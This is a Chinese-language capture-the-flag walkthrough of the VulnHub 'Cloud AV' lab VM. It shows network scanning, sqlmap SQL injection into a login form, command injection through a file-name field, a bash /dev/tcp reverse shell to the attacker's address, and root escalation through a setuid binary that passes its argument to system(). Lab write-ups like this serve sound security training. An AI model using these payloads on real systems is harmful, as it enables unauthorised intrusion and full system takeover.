下载靶机(Target):https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
靶机推荐使用 VirtualBox 导入,注意以下两个设置
VMSVGA
USB 1.1 (OHCI) 控制器
配置网络环境:https://www.cnblogs.com/shadow-/p/16815020.html
完成上面内容后,需要对 kali 与 target 做 快照记录 当前环境和布置,以免实验过程中出现错误造成不可挽回的损失
此过程一般使用 Kali 中扫描工具 arp-scan, nmap, Fping, Nping, Arping, Nbtscan, …
一般推荐 arp-scan 使用简单
使用 sudo arp-scan -l -I eth1
寻找目标,发现目标 192.168.56.109
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1 127 ⨯
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:4d:8e:be PCS Systemtechnik GmbH
192.168.56.109 08:00:27:17:f5:a8 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded
-I
是 --interface=
简写作用是指定扫描的接口,如果没有默认扫描 eth0-l
参数,当然也可以直接填写需要扫描的网段使用 nmap 对目标进行端口扫描,一个经典的 nmap 扫描命令 nmap -A -T4 192.168.56.109
即可
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.109 1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-23 14:29 CST
Nmap scan report for 192.168.56.109
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA)
| 256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA)
|_ 256 7190c326ba3be8b3537e7353274d6baf (ED25519)
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
参数 -A
用来进行操作系统及其版本的探测
参数 -T4
可以加快执行速度
从扫描结果我们可以得到以下信息
对于 ssh 目前没有头绪,我们可以尝试访问其开发的 http 服务
使用浏览器访问 http://192.168.56.109:8080/
,是一个普通网页,我们可以在网页中查看源码
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h2>This is a beta Cloud Anti-Virus Scanner service.</h2>
<h3>Please enter your invite code to start testing</h3>
<form action="/login" method="POST">
<input type="text" name="password" placeholder="Invite Code">
<input type="submit" value="Log in">
</form>
</body>
</html>
/login
网页,我们可以大致推理出,这个表单提交的数据是用于登录在网站这发现网页内容中查找可能的注入点,我们可以使用 sqlmap
进行测试
新建一个文件 target.txt
使用 Kali 的 Firefox-ESR 在页面 http://192.168.56.109:8080/
使用 Ctrl + Shift + I 打开 Web 开发者工具
Web 开发者工具中的网络工具对页面 http://192.168.56.109:8080/login
设置拦截
在页面 http://192.168.56.109:8080/
发送上面表单的 POST 请求
复制拦截的该请求的请求头和请求数据到 target.txt 文件中
使用命令 sqlmap -r target.txt -f --level 4 --risk 3
┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
_
_H
['] _ {1.6.10#stable}
| -| . [(] | .'| . |
|| [(]|||,| |
||V… || https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:18:43 /2022-10-23/
[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
从中可以看出存在注入点,并且 DBMS 可能是 SQLite
并且从 [15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
可以看出注入类型 OR boolean-based
构造 SQL 注入语句,已知注入类型 OR boolean-based
可以尝试比较通用的语句 " or 1=1--
做为页面 http://192.168.56.109:8080/
中表单的 password
值进行提交表单
到目前为止,我们成功登录 http://192.168.56.109:8080/scan
页面,通过简单的探索发现此页面是这个 Web 应用的后台管理页面,
其中存在数据提交,但通过关键词 Try scanning some of these files with our scanner!
知道传入的数据是被某种程序进行查杀,更多的是涉及 shell 中执行
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
我们可以尝试使用 |
管道进行命令串联,改变回返的数据内容,并夹杂我们想要的信息
输入尝试 a | id
得到了下面结果,这说明其中的数据没有过滤,我们可以通过这个执行命令
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
通过这个漏洞,我们可以构建一个 a | ls | grep 'xxxxx' | 想要执行的命令
我们可以查看是否存在 wget
有助于木马上传,配合 metasploit 攻击
也可以使用 nc 反弹 shell 依次执行下面命令,但上面的 nc 版本不利于反弹,也可以使用 nc 实现但比较麻烦
nc 上传 bash 反弹木马程序
a | ls | grep 'xxxxx' | touch a.sh
a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh
nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'
netcat -lvp 23333
监听端口a | ls | grep 'xxxxx' | bash a.sh
反弹 shell┌──(kali㉿kali)-[~/workspace]
└─$ netcat -lvp 23333
listening on [any] 23333 …
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
scanner@cloudav:~/cloudav_app$ ls
ls
app.py
a.sh
database.sql
get-pip.py
get-pip.py.1
get-pip.py.2
get-pip.py.3
samples
templates
scanner@cloudav:~/cloudav_app$
成功反弹 shell
本质上此用户 scanner 的可行动服务就非常高,随便的方法都能攻破【不在进行其他 shell 反弹演示,有需求自行查找】
我们已经进入目标的内部,我们探索一下目录、文件
我们在用户根目录发现一个有特殊权限的文件 -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 .
drwxr-xr-x 4 root root 4.0K Oct 21 2018 ..
-rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history
-rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local
-rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile
-rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
-rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
在linux中,-s
指的是强制位权限,具有程序运行时子进程权限继承,s 权限位是一个敏感的权限位,容易造成系统的安全问题
其中还含有源码 update_cloudav.c 我们可以查看源码,发现执行此命令需要一个参数,我们完全可以故技重施
#include
int main(int argc, char *argv[])
{
char *freshclam="/usr/bin/freshclam";
if (argc < 2){
printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
return 1;
}
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, "%s %s", freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;
}
获取 root 权限
Kali 设置 netcat -lvp 4444
监听 4444 端口
靶机上 shell 反弹 touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"
┌──(kali㉿kali)-[~]
└─$ netcat -lvp 4444
listening on [any] 4444 …
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
root@cloudav:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
游戏结束 GAMEOVER
手机扫一扫
移动阅读更方便
你可能感兴趣的文章